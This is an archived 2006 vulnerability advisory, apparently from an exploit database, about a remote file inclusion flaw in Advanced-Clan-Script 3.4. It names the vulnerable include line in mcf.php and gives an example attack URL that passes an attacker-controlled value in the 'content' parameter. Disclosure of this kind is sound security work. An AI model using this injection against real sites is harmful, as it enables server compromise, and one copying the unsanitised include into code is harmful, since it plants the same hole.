Advaced-Clan-Script <= 3.4 (mcf.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Advaced-Clan-Script <= 3.4 (mcf.php) Remote File Include Vulnerability
# Published : 2006-09-24
# Author : xdh
# Previous Title : Spidey Blog Script <= 1.5 (tr) Remote SQL Injection Exploit
# Next Title : iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection

*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*              .___.__     
*   ___  ___ __| _/|  |__  
*     /  // __ | |  |  
*    >    </ /_/ | |   Y  
*   /__/_ ____ | |___|  /
*         /    /      /  discovered by xdh
*
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    {Critical Level}: Dangerous   
*    {Class}: Remote File Inclusion                                           
*    {Venedor site}: http://avc.x.philipwette.de/     
*    {Version}: AdVancedClanscript < 3.4       
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* VUln:
* Filename: mcf.php
* Line: 70:include("$content");
*        
*    usage: http://www.test.com/path/mcf.php?content=xpl
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    greetz 2 morgan, nethug-47, r00t, tz4r, x2k,
*         jack, id and many others  
*          /server -m irc.root.net.ve -j #morgan
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# www.Syue.com [2006-09-24]